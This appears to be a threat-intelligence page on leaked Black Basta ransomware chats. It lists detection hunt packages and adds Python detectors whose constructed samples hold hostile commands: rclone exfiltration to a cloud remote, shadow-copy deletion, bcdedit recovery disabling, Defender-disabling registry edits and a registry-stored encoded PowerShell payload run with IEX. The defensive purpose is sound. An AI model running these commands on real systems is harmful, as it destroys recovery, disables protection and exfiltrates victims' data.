Threat Overview - Black Basta Update
UPDATE 03/04/2025: A significant leak of internal chat logs from the Black Basta ransomware group has given the community a glimpse into its operations, including further information about its capabilities, tools and motivations. The logs were released as a JSON file on February 11, 2025 by a Telegram user named ExploitWhispers and contain around 200,000 chat messages dated between September 2023 and September 2024. Black Basta is considered one of the most impactful ransomware groups of recent years, and this event rivals the 2022 leaks that affected the Conti ransomware gang. Using information uncovered in these leaks, threat hunters at Intel 471 have updated the collection with newly identified TTPs (tactics, techniques and procedures).
Titan References:
Malware Campaign: Qbot returns with new lures and links to Black Basta
Actor builds team to conduct ransomware attacks, seeks reliable operators
Black Basta (aka BlackBasta) ransomware group members reveal operational details
Related Hunt Package: Black Basta Emerging Threat Collection
Related Hunt Packages
Rclone Activity - Potential Data Exfiltration
Rclone is a command-line tool used to manage (and potentially exfiltrate) files on cloud storage. A large number of ransomware cases have been documented in which Rclone was used to exfiltrate files from victim machines.
Suspicious Scheduled Task Created - Execution Details Contains Scripting Reference
This content is designed to detect scheduled tasks whose execution details contain a reference to a scripting engine or script file. Malware and adversaries use this technique to maintain persistence on a compromised system.
WMIC Windows Internal Discovery and Enumeration
This will identify potentially malicious use of Windows Management Instrumentation (WMI), via wmic.exe, for local enumeration and discovery of a host.
Autorun or ASEP Registry Key Modification
A common method by which adversaries and malicious software alike achieve persistence is adding a program to the startup folder or referencing it from a Registry run key. Adding an entry to the "run keys" in the Registry or to the startup folder causes the referenced program to be executed when a user logs in. These locations are often used for legitimate purposes; however, when used maliciously the key name or value is often obviously suspicious, such as a random name, or an object loaded from a Temp or Public folder.
Microsoft Defender Antivirus Disabled via Registry Key Manipulation (Powershell ScriptBlock Logging Detection)
This package is designed to identify when Microsoft Defender Antivirus is disabled by manipulating the DisableAntiSpyware registry value (changing it from 0 to 1) via PowerShell cmdlets, as captured by PowerShell ScriptBlock logging.
Powershell Command Used to Stop VM on Hyper-V Host - Potential Ransomware Precursor
This Threat Hunt Package is meant to identify the use of PowerShell to stop all VMs on a Hyper-V host. This technique is often a precursor to ransomware deployment: a running VM keeps its virtual disk files locked, so the VMs are shut down first so that those files can be encrypted.
Potential Abuse of Built-in Network Tools for Network and Configuration Discovery
Searches for multiple living-off-the-land binaries (LOLBins) for network discovery and configuration being run within a short period of time. This indicates an attacker attempting to discover which assets are reachable on the network, as well as the local configuration of the system.
Potential Exfiltration - Common Rclone Arguments
This will identify processes executed with command-line arguments commonly associated with rclone exfiltration activity.
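As an added example for the two Rclone packages above (this is illustrative code, not Intel 471's hunt content), the following scores process-creation events on the three signals a hunter would look for: the rclone transfer verb, a cloud remote written as "name:path", and the flags ransomware crews typically pass. Because the score does not depend on the binary being called rclone.exe, a renamed copy is still caught from its arguments alone, and a Sysmon OriginalFileName of rclone.exe under a different image name is scored as an extra indicator. The events are constructed; the field names are Sysmon Event ID 1's, the values are made up.

```python
"""Hunt for rclone-style exfiltration in process-creation events.

Added example, not Intel 471 hunt-package code. Events are constructed
Sysmon Event ID 1-style records; field names (Image, OriginalFileName,
CommandLine, ProcessId) are Sysmon's, the values are invented.
"""
import re

TOKEN_RE = re.compile(r'"[^"]*"|\S+')
RCLONE_TRANSFER_VERBS = {"copy", "sync", "move", "copyto", "moveto"}
RCLONE_SUSPECT_FLAGS = {
    "--config", "--transfers", "--multi-thread-streams", "--ignore-existing",
    "--auto-confirm", "--no-check-certificate", "--progress", "-P", "-q",
    "--max-age", "--bwlimit", "--include", "--exclude",
}
# rclone remotes look like "mega:path"; requiring 2+ chars before the colon skips C:\ paths
REMOTE_RE = re.compile(r"^[A-Za-z][A-Za-z0-9_-]+:")
ALERT_THRESHOLD = 5


def tokenize(cmdline):
    # keep quoted Windows paths together, then drop the quotes
    return [t.strip('"') for t in TOKEN_RE.findall(cmdline)]


def analyze_event(event):
    image_name = event.get("Image", "").rsplit("\\", 1)[-1].lower()
    original_name = event.get("OriginalFileName", "").lower()
    args = tokenize(event.get("CommandLine", ""))[1:]  # drop the binary itself

    verb = next((a.lower() for a in args if a.lower() in RCLONE_TRANSFER_VERBS), None)
    flags = sorted({a.split("=", 1)[0] for a in args
                    if a.startswith("-") and a.split("=", 1)[0] in RCLONE_SUSPECT_FLAGS})
    remotes = [a for a in args if "://" not in a and REMOTE_RE.match(a)]
    named_rclone = "rclone" in image_name or "rclone" in original_name
    renamed = "rclone" in original_name and "rclone" not in image_name

    score = 0
    score += 2 if named_rclone else 0
    score += 2 if renamed else 0      # PE metadata says rclone, file on disk says otherwise
    score += 1 if verb else 0
    score += 2 if remotes else 0
    score += min(len(flags), 3)       # cap so flags alone cannot trip the alert
    return {"score": score, "verb": verb, "flags": flags, "remotes": remotes,
            "renamed_binary": renamed, "suspicious": score >= ALERT_THRESHOLD}


def hunt(events):
    """Return the ProcessIds of events at or above the alert threshold."""
    return [e["ProcessId"] for e in events if analyze_event(e)["suspicious"]]


# Constructed sample events
SAMPLE_EVENTS = [
    {"ProcessId": 4120, "Image": r"C:\Users\jdoe\Downloads\rclone.exe", "OriginalFileName": "rclone.exe",
     "CommandLine": r'C:\Users\jdoe\Downloads\rclone.exe copy "C:\Finance Share" mega:finance --transfers 16 -P --ignore-existing'},
    # renamed binary, Sysmon still reports the PE's original name
    {"ProcessId": 5188, "Image": r"C:\ProgramData\svchost.exe", "OriginalFileName": "rclone.exe",
     "CommandLine": r"C:\ProgramData\svchost.exe sync C:\Users\Public\stage mega:out --config C:\ProgramData\r.conf -q"},
    # same command seen by an EDR that does not expose OriginalFileName
    {"ProcessId": 5190, "Image": r"C:\ProgramData\svchost.exe",
     "CommandLine": r"C:\ProgramData\svchost.exe sync C:\Users\Public\stage mega:out --config C:\ProgramData\r.conf -q"},
    {"ProcessId": 612, "Image": r"C:\Windows\System32\svchost.exe", "OriginalFileName": "svchost.exe",
     "CommandLine": r"C:\Windows\System32\svchost.exe -k netsvcs -p"},
    {"ProcessId": 3320, "Image": r"C:\Windows\System32\Robocopy.exe", "OriginalFileName": "robocopy.exe",
     "CommandLine": r"C:\Windows\System32\Robocopy.exe C:\Data \\fs01\Backup /MIR"},
    # rclone used by an admin to list a remote: named and remote, but no transfer, below threshold
    {"ProcessId": 7001, "Image": r"C:\Tools\rclone.exe", "OriginalFileName": "rclone.exe",
     "CommandLine": r"C:\Tools\rclone.exe lsd backup:"},
]

if __name__ == "__main__":
    for e in SAMPLE_EVENTS:
        print(e["ProcessId"], analyze_event(e))
```

The third sample is the important one: with no file name or PE metadata pointing at rclone, the transfer verb, the "mega:" remote and two typical flags still reach the threshold, which is the point of hunting on arguments rather than on the name rclone.exe.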
Living Off The Land Technique - Esentutl.exe
This package is designed to identify when the Microsoft Windows native binary esentutl.exe is used to perform actions that may be abnormal and possibly malicious.
Excessive Windows Discovery and Execution Processes - Potential Malware Installation
This package uses a list of commonly abused LOLBins that an attacker or malware would execute in quick succession. Multiple executions of programs from the list on a host can be indicative of an infection or other malicious activity. To reduce false positives, use a distinct count per process name to require that more than 5 unique processes from the list were executed, rather than simply checking that more than 6 events were generated on the host.
Mimikatz Non-Interactive Execution
This package identifies when a Mimikatz payload has been executed on a system as a one-liner, likely writing its output to a file for later collection. This is not the standard interactive way Mimikatz is run, but adversaries still execute it in this fashion.
Usage of chmod to Enable Execution - Potential Payload Staging
This hunt package identifies instances where the 'chmod' command is used to modify file permissions, specifically focusing on changes that grant executable rights. By correlating these events with user contexts and known file paths, the package aims to highlight potentially malicious activities, such as the preparation of a system for exploitation or the setup of persistence mechanisms by unauthorized users.
Rundll32 Run Without Arguments
Rundll32 running without any command-line arguments is very anomalous and should be investigated. This can be indicative of malicious activity.
Remote Services - SMB Share mounts/admin shares/scanning
This use case detects when shares are mapped via net.exe on the command line, more specifically hidden administrative shares (such as C$ and ADMIN$) that can be mapped and used to remotely copy malicious files and/or executables.
Microsoft Defender Antivirus Disabled via Registry Key Manipulation (CommandLine Execution)
This package is designed to detect when Microsoft Defender Antivirus is disabled by manipulating the DisableAntiSpyware registry value (changing it from 0 to 1). It focuses on the command-line arguments executed to modify the registry value, for example via reg.exe.
Suspicious Scheduled Task Created - Encoded PowerShell Payload Executed From Registry
This package is intended to identify when a scheduled task creation command is used to create a task that runs PowerShell with a base64-encoded payload stored in the Windows Registry.
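As an added example for the package above (illustrative code, not Intel 471's hunt content), the following pulls the /tr action out of a schtasks /create command line, decodes any PowerShell -EncodedCommand argument (base64 of UTF-16LE text, which is what powershell.exe expects) and flags tasks whose decoded stub both reads the registry and executes what it read. The sample command lines are constructed in the code itself; the task names and the HKCU path are invented for the demo.

```python
"""Decode -EncodedCommand payloads inside schtasks /create commands.

Added example, not Intel 471 hunt-package code. Sample tasks are constructed
below; the task names and the registry path are illustrative.
"""
import base64
import re

TOKEN_RE = re.compile(r'"[^"]*"|\S+')
# signs the decoded script reads a value back out of the registry
REGISTRY_READ_RE = re.compile(
    r"Get-ItemProperty(?:Value)?\b|\.GetValue\(|\bHK(?:CU|LM):\\|Registry::", re.I)
# signs it executes that value rather than just logging it
DYNAMIC_EXEC_RE = re.compile(
    r"\biex\b|Invoke-Expression|\[scriptblock\]::Create|FromBase64String", re.I)


def encode_ps(script):
    """Encode a script the way powershell.exe -EncodedCommand expects it."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_ps(b64):
    try:
        return base64.b64decode(b64, validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def _is_encoded_switch(tok):
    # powershell.exe accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc, ...)
    t = tok.lower().lstrip("-/")
    return tok[:1] in ("-", "/") and t.startswith("e") and "encodedcommand".startswith(t)


def analyze_schtasks(cmdline):
    tokens = [t.strip('"') for t in TOKEN_RE.findall(cmdline)]
    low = [t.lower() for t in tokens]
    result = {"is_create": False, "task_name": None, "encoded": False, "decoded": None,
              "reads_registry": False, "executes_dynamic": False, "suspicious": False}
    if not low or low[0].rsplit("\\", 1)[-1] not in ("schtasks", "schtasks.exe") or "/create" not in low:
        return result
    result["is_create"] = True
    opts = {low[i]: tokens[i + 1] for i in range(len(tokens) - 1) if low[i] in ("/tn", "/tr", "/sc", "/ru")}
    result["task_name"] = opts.get("/tn")

    # the /tr value is its own command line; tokenize it again and look for the encoded switch
    action = TOKEN_RE.findall(opts.get("/tr", ""))
    for i, tok in enumerate(action[:-1]):
        if _is_encoded_switch(tok):
            decoded = decode_ps(action[i + 1].strip('"'))
            if decoded is not None:
                result.update(encoded=True, decoded=decoded,
                              reads_registry=bool(REGISTRY_READ_RE.search(decoded)),
                              executes_dynamic=bool(DYNAMIC_EXEC_RE.search(decoded)))
            break
    result["suspicious"] = result["encoded"] and result["reads_registry"] and result["executes_dynamic"]
    return result


# Constructed samples: the stub reads a base64 blob from HKCU and IEXes it
PAYLOAD_FROM_REGISTRY = (
    "$p = (Get-ItemProperty -Path 'HKCU:\\Software\\Classes\\OneDrive').Payload; "
    "IEX ([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($p)))"
)
BENIGN_SCRIPT = "Get-Date | Out-File C:\\Temp\\lastrun.txt"

SAMPLE_TASKS = [
    f'schtasks /create /tn "OneDriveUpdateTask" /sc onlogon /tr "powershell.exe -w hidden -enc {encode_ps(PAYLOAD_FROM_REGISTRY)}"',
    r'C:\Windows\System32\schtasks.exe /create /tn "NightlyBackup" /sc daily /st 02:00 /tr "powershell.exe -File C:\Scripts\backup.ps1"',
    f'schtasks /create /tn "LastRun" /sc hourly /tr "powershell.exe -EncodedCommand {encode_ps(BENIGN_SCRIPT)}"',
    'schtasks /query /tn "OneDriveUpdateTask"',
]

if __name__ == "__main__":
    for cmd in SAMPLE_TASKS:
        r = analyze_schtasks(cmd)
        print(r["task_name"], "encoded" if r["encoded"] else "plain", "SUSPICIOUS" if r["suspicious"] else "")
```

The third sample shows why decoding matters: an encoded command on its own is worth a look but not an alert, whereas the first sample, once decoded, reveals the registry read and the Invoke-Expression that the raw schtasks command line hides.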
Atera Agent utilized for Unauthorized Remote Access
This package identifies when the Atera Agent is installed for remote connectivity by looking for key registry values or command-line arguments used to install and register the agent to an unauthorized account. This package uses several different artifacts to identify this behavior; check the 'Deployment Requirements' section for each tool to understand its limitations and requirements. NOTE: If your organization uses Atera, you will need to add your business name to the query parameters.
RDP Enabled Via NETSH
This hunt package is designed to capture command-line arguments executed through netsh in order to enable Remote Desktop Protocol (RDP), typically by opening the associated firewall rule.
Remote WMI Command Attempt
This hunt searches for wmic.exe being launched with parameters to operate on remote systems. This could uncover an attacker abusing WMI functionality, in order to potentially perform remote executions or to simply gather information.
Suspicious bcdedit Activity - Potential Ransomware
BCDEdit is a command-line tool for managing Boot Configuration Data (BCD). Ransomware is known to utilize bcdedit to modify the boot configuration to prevent recovery. The intent of this package is to identify when bcdedit is being utilized with several common malicious commands, such as delete and safeboot.
Local Data Staging - ADFind.exe
This content has been designed to identify when ADFind.exe is staging data on a local resource, possibly for exfiltration.
Excessive Windows Discovery CommandLine Arguments - Potential Malware Installation
This content is designed to detect when the same discovery tool (ipconfig.exe, netstat.exe, ping.exe) is executed in quick succession with different arguments and strings.
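As an added example covering the three discovery packages above (Built-in Network Tools, Excessive Windows Discovery and Execution Processes, and Excessive Windows Discovery CommandLine Arguments), the following implements both checks over a sliding per-host time window: a distinct count of watch-listed LOLBins (the "over 5 unique processes" threshold, not a raw event count), and the same tool re-run with different command lines (a sweep). This is illustrative code, not Intel 471's hunt content; the events are constructed (host, time, image, command line) tuples and the watch list is an assumption.

```python
"""Windowed hunt for discovery-tool bursts in process-creation telemetry.

Added example, not Intel 471 hunt-package code. Two checks over a sliding
per-host window:
  1. many DISTINCT discovery LOLBins executed within the window
  2. the SAME tool executed repeatedly with DIFFERENT arguments
Events are constructed tuples: (host, utc_time, image_path, command_line).
"""
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Built-in Windows binaries commonly chained for host and network discovery (assumed watch list)
DISCOVERY_LOLBINS = {
    "whoami.exe", "net.exe", "net1.exe", "ipconfig.exe", "netstat.exe", "ping.exe",
    "nltest.exe", "systeminfo.exe", "arp.exe", "quser.exe", "qwinsta.exe",
    "tasklist.exe", "nslookup.exe", "route.exe", "hostname.exe", "wmic.exe",
}


def _parse_ts(ts):
    return datetime.strptime(ts, "%Y-%m-%dT%H:%M:%S")


def hunt_discovery_bursts(events, window_seconds=60, min_distinct_procs=6, min_distinct_args=3):
    by_host = defaultdict(list)
    for host, ts, image, cmd in events:
        name = image.rsplit("\\", 1)[-1].lower()
        if name in DISCOVERY_LOLBINS:
            by_host[host].append((_parse_ts(ts), name, " ".join(cmd.split()).lower()))

    findings = []
    span = timedelta(seconds=window_seconds)
    for host, evs in by_host.items():
        evs.sort()
        window = deque()
        procs_fired, args_fired = False, set()
        for ts, name, cmd in evs:
            window.append((ts, name, cmd))
            while ts - window[0][0] > span:      # slide: drop events older than the window
                window.popleft()
            distinct_procs = {n for _, n, _ in window}
            if not procs_fired and len(distinct_procs) >= min_distinct_procs:
                findings.append({"host": host, "type": "distinct_lolbins", "at": ts.isoformat(),
                                 "processes": sorted(distinct_procs)})
                procs_fired = True                # one finding per host, not one per extra event
            variants = {c for _, n, c in window if n == name}
            if name not in args_fired and len(variants) >= min_distinct_args:
                findings.append({"host": host, "type": "same_tool_varied_args", "at": ts.isoformat(),
                                 "process": name, "command_lines": sorted(variants)})
                args_fired.add(name)
    return findings


# Constructed sample telemetry
SAMPLE_EVENTS = [
    # WS01: recon burst, six distinct tools in 40 seconds
    ("WS01", "2025-03-01T10:00:00", r"C:\Windows\System32\whoami.exe", "whoami /all"),
    ("WS01", "2025-03-01T10:00:05", r"C:\Windows\System32\net.exe", 'net group "domain admins" /domain'),
    ("WS01", "2025-03-01T10:00:12", r"C:\Windows\System32\ipconfig.exe", "ipconfig /all"),
    ("WS01", "2025-03-01T10:00:20", r"C:\Windows\System32\nltest.exe", "nltest /dclist:corp"),
    ("WS01", "2025-03-01T10:00:31", r"C:\Windows\System32\systeminfo.exe", "systeminfo"),
    ("WS01", "2025-03-01T10:00:40", r"C:\Windows\System32\arp.exe", "arp -a"),
    # SRV01: one tool, a different target each time (ping sweep)
    ("SRV01", "2025-03-01T11:00:00", r"C:\Windows\System32\PING.EXE", "ping -n 1 10.0.0.5"),
    ("SRV01", "2025-03-01T11:00:01", r"C:\Windows\System32\PING.EXE", "ping -n 1 10.0.0.6"),
    ("SRV01", "2025-03-01T11:00:02", r"C:\Windows\System32\PING.EXE", "ping -n 1 10.0.0.7"),
    ("SRV01", "2025-03-01T11:00:03", r"C:\Windows\System32\PING.EXE", "ping -n 1 10.0.0.8"),
    # WS02: ordinary troubleshooting, same command twice, half an hour apart
    ("WS02", "2025-03-01T09:00:00", r"C:\Windows\System32\ipconfig.exe", "ipconfig /all"),
    ("WS02", "2025-03-01T09:30:00", r"C:\Windows\System32\ipconfig.exe", "ipconfig /all"),
    ("WS02", "2025-03-01T09:00:01", r"C:\Windows\System32\notepad.exe", "notepad"),
    # WS03: the same six tools as WS01 but two minutes apart, outside a 60 s window
    ("WS03", "2025-03-01T14:00:00", r"C:\Windows\System32\whoami.exe", "whoami"),
    ("WS03", "2025-03-01T14:02:00", r"C:\Windows\System32\net.exe", "net view"),
    ("WS03", "2025-03-01T14:04:00", r"C:\Windows\System32\ipconfig.exe", "ipconfig"),
    ("WS03", "2025-03-01T14:06:00", r"C:\Windows\System32\nltest.exe", "nltest /domain_trusts"),
    ("WS03", "2025-03-01T14:08:00", r"C:\Windows\System32\systeminfo.exe", "systeminfo"),
    ("WS03", "2025-03-01T14:10:00", r"C:\Windows\System32\arp.exe", "arp -a"),
]

if __name__ == "__main__":
    for f in hunt_discovery_bursts(SAMPLE_EVENTS):
        print(f)
```

WS03 is the tuning lesson: the same six tools spread over ten minutes produce nothing with a 60-second window but do fire with window_seconds=900, so the window is the knob that trades missed slow recon against noise from administrators.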
Microsoft Defender Antivirus Disabled via Registry Key Manipulation
This content is designed to identify when Microsoft Defender Antivirus is disabled through manipulation of the DisableAntiSpyware registry value, or when the way Microsoft Defender responds to detected threats is changed through registry keys.
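As an added example for the three Defender packages on this page (the ScriptBlock, CommandLine and registry-key variants), the following applies one set of checks to either a process command line or raw PowerShell script text, which is why it needs no parent-process context: reg.exe add of a disable value set to 1 under a Defender key, Set-ItemProperty/New-ItemProperty doing the same, a Threats\ThreatSeverityDefaultAction entry set to 6 (Allow), and Set-MpPreference -Disable* $true or -*ThreatDefaultAction Allow. This is illustrative code, not Intel 471's hunt content; the sample lines are constructed. One caveat a hunter should know: on current Windows 10/11 and Server 2019+ with tamper protection enabled, Defender ignores DisableAntiSpyware, so a hit here is evidence of intent rather than proof that protection went down.

```python
"""Hunt for Defender being disabled or neutered via registry and cmdlets.

Added example, not Intel 471 hunt-package code. Works on a process command
line (reg.exe, powershell.exe) or on PowerShell ScriptBlock text alike.
Sample lines are constructed for this demo.
"""
import re

TOKEN_RE = re.compile(r'"[^"]*"|\'[^\']*\'|\S+')

# Defender policy/product keys, in reg.exe "HKLM\..." and PowerShell "HKLM:\..." forms
DEFENDER_KEY_RE = re.compile(
    r"HK(?:LM|EY_LOCAL_MACHINE):?\\SOFTWARE\\(?:Policies\\)?Microsoft\\Windows Defender", re.I)
THREAT_ACTION_KEY_RE = re.compile(r"Windows Defender\\Threats\\ThreatSeverityDefaultAction", re.I)

# DWORD values that switch a protection component off when set to 1
DISABLE_VALUES = {
    "disableantispyware", "disablerealtimemonitoring", "disablebehaviormonitoring",
    "disableonaccessprotection", "disableioavprotection", "disablescanonrealtimeenable",
}
ALLOW_ACTION = 6  # default-action code meaning "Allow"

ITEMPROPERTY_RE = re.compile(r"\b(?:Set|New)-ItemProperty\b", re.I)
NAME_RE = re.compile(r"-Name\s+['\"]?(\w+)", re.I)
VALUE_RE = re.compile(r"-Value\s+['\"]?(\w+)", re.I)
MPPREF_RE = re.compile(r"\bSet-MpPreference\b", re.I)
MPPREF_DISABLE_RE = re.compile(r"-(Disable\w+)\s+(?:\$true|1)\b", re.I)
MPPREF_ACTION_RE = re.compile(r"-(\w+ThreatDefaultAction)\s+(?:Allow|6)\b", re.I)


def _tokens(text):
    return [t.strip("\"'") for t in TOKEN_RE.findall(text)]


def _to_int(s):
    try:
        return int(s, 0)  # accepts "1" and "0x1"
    except (TypeError, ValueError):
        return None


def _reg_add_findings(tokens, text):
    findings = []
    for i, tok in enumerate(tokens[:-1]):
        if tok.lower().rsplit("\\", 1)[-1] in ("reg", "reg.exe") and tokens[i + 1].lower() == "add":
            args = tokens[i + 2:]
            opts = {args[j].lower(): args[j + 1] for j in range(len(args) - 1) if args[j].startswith("/")}
            name, data = opts.get("/v", "").lower(), _to_int(opts.get("/d"))
            if DEFENDER_KEY_RE.search(text):
                if name in DISABLE_VALUES and data == 1:
                    findings.append(f"reg add sets {name}=1 (component disabled)")
                if THREAT_ACTION_KEY_RE.search(text) and data == ALLOW_ACTION:
                    findings.append(f"reg add sets threat severity {name} default action to Allow")
    return findings


def _powershell_findings(text):
    findings = []
    if ITEMPROPERTY_RE.search(text) and DEFENDER_KEY_RE.search(text):
        name, value = NAME_RE.search(text), VALUE_RE.search(text)
        if name and value and name.group(1).lower() in DISABLE_VALUES and _to_int(value.group(1)) == 1:
            findings.append(f"{name.group(1)} set to 1 via *-ItemProperty")
    if MPPREF_RE.search(text):
        findings += [f"Set-MpPreference -{p} $true" for p in MPPREF_DISABLE_RE.findall(text)]
        findings += [f"Set-MpPreference -{p} Allow" for p in MPPREF_ACTION_RE.findall(text)]
    return findings


def assess(text):
    """Return the Defender-weakening actions found in one command line or script block."""
    return _reg_add_findings(_tokens(text), text) + _powershell_findings(text)


# Constructed samples: five hostile, three benign
SAMPLE_LINES = [
    r'reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f',
    r'C:\Windows\System32\reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableRealtimeMonitoring /t REG_DWORD /d 0x1 /f',
    r'reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v 5 /t REG_SZ /d 6 /f',
    r"Set-ItemProperty -Path 'HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender' -Name DisableAntiSpyware -Value 1",
    r"Set-MpPreference -DisableRealtimeMonitoring $true -DisableIOAVProtection $true -LowThreatDefaultAction Allow",
    r'reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 0 /f',
    r'reg query "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware',
    r"Get-MpPreference | Select-Object DisableRealtimeMonitoring",
]

if __name__ == "__main__":
    for line in SAMPLE_LINES:
        print(assess(line) or "-", "<-", line[:70])
```

Note the sixth line: the same reg add with /d 0 is someone turning Defender back on, so the check keys on the value written, not merely on the value name being touched.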
Suspicious Child Process - Calc.exe
This use case is meant to identify when calc.exe contains a child process other than calc.exe. Calc.exe containing a child process other than itself should be considered abnormal, and could be indicative of process injection or other malicious activity.
Shadow Copies Deletion Using Operating Systems Utilities
Ransomware is known to delete Windows shadow copies before it begins encrypting the data on the victim host, so that the data cannot be restored from them. This tactic is typically carried out with PowerShell, vssadmin or wmic. This package identifies activity by powershell, wmic, vssadmin or vssvc with command-line arguments containing delete and variations of shadow.
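As an added example for this package and for Suspicious bcdedit Activity above (illustrative code, not Intel 471's hunt content), the following matches normalised command lines against the vssadmin/wmic/PowerShell shadow-copy deletions and the bcdedit recovery and safeboot changes, then groups hits per host so that two different recovery-inhibiting categories on one machine stand out from a lone administrative action. It goes one step beyond the page's list by also tagging wbadmin catalog deletion, which is commonly seen alongside these commands. The events are constructed (host, command line) pairs.

```python
"""Hunt for inhibit-system-recovery commands that precede encryption.

Added example, not Intel 471 hunt-package code. Events are constructed
(host, command_line) pairs.
"""
import re
from collections import defaultdict

# (tag, pattern) evaluated against a lowercased, whitespace-collapsed command line
RULES = [
    ("shadow_copy_delete", r"\bvssadmin(?:\.exe)?\b.*\bdelete\s+shadows\b"),
    ("shadow_storage_resize", r"\bvssadmin(?:\.exe)?\b.*\bresize\s+shadowstorage\b"),
    ("shadow_copy_delete", r"\bwmic(?:\.exe)?\b.*\bshadowcopy\b.*\bdelete\b"),
    ("shadow_copy_delete", r"win32_shadowcopy\b.*(?:\.delete\(\)|remove-(?:wmiobject|ciminstance))"),
    ("backup_catalog_delete", r"\bwbadmin(?:\.exe)?\b.*\bdelete\s+(?:catalog|systemstatebackup)\b"),
    ("boot_recovery_disabled", r"\bbcdedit(?:\.exe)?\b.*\brecoveryenabled\s+(?:no|off|false)\b"),
    ("boot_recovery_disabled", r"\bbcdedit(?:\.exe)?\b.*\bbootstatuspolicy\s+ignoreallfailures\b"),
    ("boot_entry_deleted", r"\bbcdedit(?:\.exe)?\b.*\s/delete\s+\{"),
    ("safeboot_manipulation",
     r"\bbcdedit(?:\.exe)?\b.*(?:/set\b.*\bsafeboot\s+(?:minimal|network)\b|/deletevalue\b.*\bsafeboot\b)"),
]
COMPILED = [(tag, re.compile(pat)) for tag, pat in RULES]


def normalise(cmd):
    # defeats case games and padded whitespace before matching
    return " ".join(cmd.split()).lower()


def classify(cmd):
    """Return the sorted set of recovery-inhibiting tags one command line trips."""
    n = normalise(cmd)
    return sorted({tag for tag, rx in COMPILED if rx.search(n)})


def hunt(events, min_categories=2):
    """Per host: all tags seen, and whether at least min_categories distinct ones were seen."""
    per_host = defaultdict(set)
    for host, cmd in events:
        per_host[host].update(classify(cmd))
    return {host: {"tags": sorted(tags), "high_confidence": len(tags) >= min_categories}
            for host, tags in per_host.items() if tags}


# Constructed sample events
SAMPLE_EVENTS = [
    ("FS01", r"C:\Windows\System32\vssadmin.exe delete shadows /all /quiet"),
    ("FS01", "VSSADMIN.EXE   Delete   Shadows /All /Quiet"),   # same thing, odd casing and spacing
    ("FS01", r"C:\Windows\System32\wbem\WMIC.exe shadowcopy delete"),
    ("FS01", r"bcdedit.exe /set {default} recoveryenabled No"),
    ("FS01", r"bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures"),
    ("WS07", r'powershell.exe -c "Get-WmiObject Win32_Shadowcopy | ForEach-Object { $_.Delete() }"'),
    ("WS07", r"bcdedit /set safeboot network"),
    ("BK01", r"vssadmin.exe Resize ShadowStorage /For=C: /On=C: /MaxSize=401MB"),  # lone admin action
    ("ADM01", r"vssadmin.exe list shadows"),
    ("ADM01", r"bcdedit.exe /enum {current}"),
    ("ADM01", r"wbadmin get versions"),
]

if __name__ == "__main__":
    for host, verdict in hunt(SAMPLE_EVENTS).items():
        print(host, verdict)
```

BK01 shows the intended tuning: resizing shadow storage is a real administrative task, so on its own it is reported with a single tag, while FS01 and WS07 each combine shadow-copy removal with a boot configuration change and are marked high confidence. Encoded or obfuscated PowerShell is out of scope here and would need decoding first.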
Regsvr32 Running Files from Temp Directories
This Hunt Package is designed to identify files executed (such as DLLs) from a temporary directory by regsvr32.exe. This LOLB is often abused to proxy execution or launch malicious applications/malware.
AnyDesk Execution from Abnormal Folder - Potential Malicious Use of RMM Tool
AnyDesk is a common and widely used tool for remotely controlling machines. However, it has also been adopted by many actors to remotely access victim machines and deploy malware or ransomware payloads. This Hunt Package is designed to exclude the common paths from which AnyDesk is executed. Because AnyDesk can be installed or executed from nearly any directory, analysts should review whether AnyDesk is allowed and follow internal policies if it is not authorized. Some common "red flag" directories are temporary directories, ProgramData and System32. Additionally, to appear more legitimate, some attackers use installation paths with legitimate-sounding names, such as "Microsoft Management" or "Customer Service".